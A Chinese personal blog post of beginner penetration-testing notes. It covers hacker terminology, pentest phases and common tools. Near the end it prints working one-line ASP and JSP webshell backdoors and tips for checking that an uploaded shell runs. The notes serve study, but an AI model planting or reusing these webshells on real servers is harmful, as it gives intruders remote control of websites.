Cong's Blog.

渗透学习笔记 一

字数统计: 3.4k阅读时长: 11 min
2019/07/29 Share

0x01 信息安全的定义

信息安全,意为保护信息及信息系统免受未经授权的进入、使用破坏、修改、检视、记录以及销毁。

0x02 信息安全的影响

政府、军队、公司、金融机构、医院、私人企业积累了大量的有关他们的雇员、顾客、研究、金融数据的机密信息。绝大多数此类信
息现在被存储在手机、计算机、存储设备内,并通过网络传送到别的计算机
诸如一家企业的顾客、财政情况、新产品线等机密信息落入其他竞争对手的手中,这种安全性的丧失可能导致经济上的损失、法律诉讼甚至 能导致该企业的破产。保护机密的信息是商业上的需求,并且在许多情况下也是道德和法律上的需求

0x03 信息安全的保障

为保障信息的安全,要求有信息源的认证、访问控制、不能有非法的软件驻留,补鞥呢有未授权的操作行为。

0x04 黑客术语

0x05 肉鸡

所谓“肉鸡”是一种很形象的比喻,比喻哪些可以随意被我们控制的电脑,对方可以是windows系统,也可以是unix/linux系统,可以是普通的个人电脑,也可以是大型的服务器,我们可以像操作自己电脑那样来操作他们。

0x06 弱口令

指的是强度不够,容易被猜解的密码。类似“admin、12345”等

0x07 webshell

webshell是以asp、php、jsp、或者cgi等玩网页文件形式存在的一种命令执行环境,也可以是将其称作是一种网页后门。黑客在入侵一个网站后。通常将这些asp或php后门文件与网站服务器web目录下的正常文件混在一起,可以使用浏览器来访问这些asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。可以上传和下载文件,查看数据库,执行程序命令等。

0x08 木马

表面上伪装成正常的程序,但是当木马程序运行时,就会获取系统的整个控制权限。比如灰鸽子等木马程序。需要注意的是木马和病毒的区别:
1、病毒是当已敢感染的软件运行时,这些恶性程序向计算机软件添加代码,修改程序的工作方式,从而获取计算机的控制权
2、木马是指未经用户同意进行的非授权的一种恶意程序。它们可能删除硬盘上的数据,而是依靠黑客来进行传播,它们常常被伪装成 “正常”转件进行传播。
3、他们最大的区别就是病毒具有感染性,而木马一般不具有感染性,另外,病毒入侵后立刻又感觉,而木马入侵后希望你没有感觉没这样才有利于它开展工作。木马虽然属于病毒中的一类,但要单独的中病毒类型中剥离出来,独立的称为“木马”程序。

0x09 注入点

可以实行注入的地方,通常是一个访问数据库的连接。根据注入点数据库的运行账号的权限不同,你所获得的的权限也不同。例如:得到的是普通用户的权限,不可能执行管理源才能进行的操作。就好像一个普通员工不可能有老板的权利。

0x10 上传点:

网站中可以上传文件或者图片的url,黑客利用这些上传点的漏洞,将可执行的脚本文件上传至目标服务器,从而控制整个网站甚至整个服务器。

0x11 后门

入侵者在利用某些方法成功的控制了目标主机后,可以在对方的系统中植入特定的程序,或者是修改某些设置。这些改动表面上是很难被察觉的,但是入侵者却可以使用相应的程序或者方法来轻易的与这台电脑建立连接,重新控制这台电脑.

0x12 远控:

管理人员在异地通过计算机网络异地拨号或双方都接入Internet等手段,连接需要被控制的计算机,将被控制的计算机的桌面环境显示到自己的计算机上,通过本地计算机对远方计算机进行配置、软件安装程序、修改等工作。

0x13 免杀和提权

通过加壳、加密、修改特征码、加花指令等等技术来修改程序,使其逃过杀毒软件的查杀。还可以通过该证书窃取使其逃过杀毒软件的查杀。
提权是操作系统将系统中低权限的用户提升为管理员权限或者是能执行相关文件的权限的方法。即在获取内网账户后,如果得到的是普通用户,在通过相关的提权操作后获取管理员权限,进而可以看到和修改获取更多的数据。

0x14 渗透测试

渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存
在的位置来进行的,并且从这个位置有条件主动利用安全漏洞。
渗透测试分为黑盒测试和白盒测试
(1)黑盒测试是在授权的情况下,模拟黑客的攻击方法和思维方式,来评估计算机网络系统可能存在的安全风险。一般是甲方给你一个域名,让你来攻击,以此来查看系统存在的风险。
(2)白盒测试:相对黑河测试,白盒测试基本是从内部发起,根据已知的信息进行渗透测试,发现风险。可以提供源码,进行代码审计。甲方提供配置清单和配置情况,资产清单。以此来评估安全风险。
测试流程:
1.信息收集:渗透测试者可以使用的情报收集方法包括公开源信息查询、Google hacking 、社会工程学、网络踩点、扫描探测、被动监听、服务差点
2.威胁建模
渗透者需要综合分析前几个阶段获取并汇总的情报信息收集,找出可以渗透攻击的攻击点,并在实验环境中进行验证
3.渗透测试
渗透测试团队需要利用他们所找出的目标系统安全漏洞,来真正入侵系统当中,获得访问控制权
4.后渗透测试
渗透测试团队根据目标组织的业务经营模式、保护资产形式与安全防御计划的不懂特点,自主设计出攻击目标,识别关键基础设施,并寻找客户组织最具脚趾和尝试安全保护的信息和资产,最终达成能够对客户组织造成最重要业务影响的攻击途径
5.报告输出
信息收集提示:
1.收集相关目标的信息 例:真实ip 子域名 资产(包含以上,外加使用了哪些配置如:哪些数据库、哪些编程语言 写的网站应用,开放了哪些端口
威胁建模提示:
1.对刚刚找到的所有信息 进行分析和搭建(win2008 +APACHE2.1.3+MYSQL5.0.1+PHP5.0)。分析对应端口服务 MS17-010 80 445 3306 3389 windows WAMP WNMP。即搭建靶场,进行模拟攻击
渗透测试提示:相当于是通过利用漏洞,获取进入内网的权限,这属于踹开门的步骤。
后渗透测试:相当于是在打开门的基础上对特定业务和信息资产进行具体的攻击。并测试攻击会造成甲方业务的影响情况。最终形成详细的渗透报告

0x15 渗透测试工具

渗透测试工具分为:漏洞利用类、信息收集类、漏洞扫描类、综合平台类
信息收集类:Namp zenmap:用来探测计算机网络上的主机和服务的一种安全扫描器。
Zenmap旨在为nmap提供更加简单的操作方式。简单常用的操作命令可以保存成为profile,用户扫描时选择profile即可;可以方便地比较不同的扫描结果;提供网络拓扑结构(NetworkTopology)的图形显示功能。
Nmap用于列举网络主机清单、管理服务升级调度、监控主机或服务运行状况。Nmap可以检测目标机是否在线、端口开放情况、侦测运行的服务类型及版本信息、侦测操作系统与设备类型等信息
Nmap的优点:

  1. 灵活。支持数十种不同的扫描方式,支持多种目标对象的扫描。
  2. 强大。Nmap可以用于扫描互联网上大规模的计算机。
  3. 可移植。支持主流操作系统:Windows/Linux/Unix/MacOS等等;源码开放,方便移植。
  4. 简单。提供默认的操作能覆盖大部分功能。
    御剑:是一款用于网站后台的扫描工具。
    google:
    用Google搜索引擎对某些特定的网络主机漏洞(通常是服务器上的脚本漏洞)进行搜索,以达到快速找到漏洞主机或特定主机的漏洞的目的。
    Maltego
    是一款专业的数字取证软件,它提供了基于实体的网络和源,聚合了整个网络的信息。
    whois查询
    一个用来查询域名是否已经被注册,以及注册域名的详细信息的数据库(如域名所有人、域名注册商、域名注册日期和过期日期等)
    Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统
    常用网站:www.exploit-db.com www.seebug.net www.shadon.io(漏洞和企业资产信息收集) 漏洞信息形成原因 以及漏洞形成脚本 漏洞原理 cve??
    x.threebook.cn微步在线威胁情报社区
    漏洞扫描类
    AWVS
    一个自动化的Web应用程序安全测试工具。
    H3C WebScan
    是由H3C自主开发一款主动型的 Web 应用的风险深度扫描工具。
    AppScan
    是一款领先的应用安全性测试套件,可自动进行漏洞评估、扫描和检测所有常见的 Web 应用程序漏洞。
    Netsparker
    是一款综合型的Web应用安全漏洞扫描工具,它分为专业版和免费版,免费版的
    功能也比较强大。
    Nessus
    是目前全世界最多人使用的系统漏洞扫描与分析软件。
    巡风
    巡风是一款适用于企业内网的漏洞快速应急,巡航扫描系统
    漏洞利用类
    中国菜刀
    是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。
    Sqlmap
    一个开放源码的渗透测试工具,它可以自动探测和利用 SQL 注入漏洞来接管数
    据库服务器。
    啊D
    是一个注入验证利用工具,是目前已有的Sql注入工具中比较好用的。
    漏洞品台类
    BurpSuite
    是用于攻击Web 应用程序的集成平台。它包含了许多工具,并为这些工具设计
    了许多接口,以促进加快攻击应用程序的过程。
    Metasploit
    Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别
    安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供
    真正的安全风险情报。这些功能包括智能开发,密码审计,Web应用程序扫描,
    社会工程。
    webshell 大多是以动态脚本出现比如asp jsp php aspx cgi 常用做网站后门 俗称马 可以和正常的网页文件混合 无系统日志记录 能绕过防火墙 分为大马 小马 大马脚本功能齐全 代码量庞大 提供完整的操作提供全面的文件操作数据库链接管理执行命令等功能 大马不依赖客户端(例如菜刀) 小马 主要是代码量比较少,一般就一行 使用时用一些工具进行连接(一句话木马)比较依赖客户端管理软件
    常见一句话webshell Asp<%execute(request(“value”))% value 是密码 php
    jsp <%if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath(“/“)+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());%>
    中国菜刀 支持动态脚本 中国菜刀主要功能:文件管理,虚拟终端 数据库管理
    一句话木马上传到解析目录 页面空白说明webshell被解析 看到源码数据则是解析失败
    googlehacking:filetype:sql intext intitle site(网站)
    Asp一句话原理
    <%execute request(“#”)%>是典型的一句话木马服务端代码,将这
    个代码写入asp文件,就成了一句话木马服务端文件。
    将一句话木马插入到asp文件中(包括asa.cdx.cer文件),该语句
    将会作为触发,接收入侵者通过客户端提交的数据,执行并完成相应的入侵
    操作。
CATALOG
  1. 1. 0x01 信息安全的定义
  2. 2. 0x02 信息安全的影响
  3. 3. 0x03 信息安全的保障
  4. 4. 0x04 黑客术语
    1. 4.1. 0x05 肉鸡
    2. 4.2. 0x06 弱口令
    3. 4.3. 0x07 webshell
    4. 4.4. 0x08 木马
    5. 4.5. 0x09 注入点
    6. 4.6. 0x10 上传点:
    7. 4.7. 0x11 后门
    8. 4.8. 0x12 远控:
    9. 4.9. 0x13 免杀和提权
  5. 5. 0x14 渗透测试
  6. 6. 0x15 渗透测试工具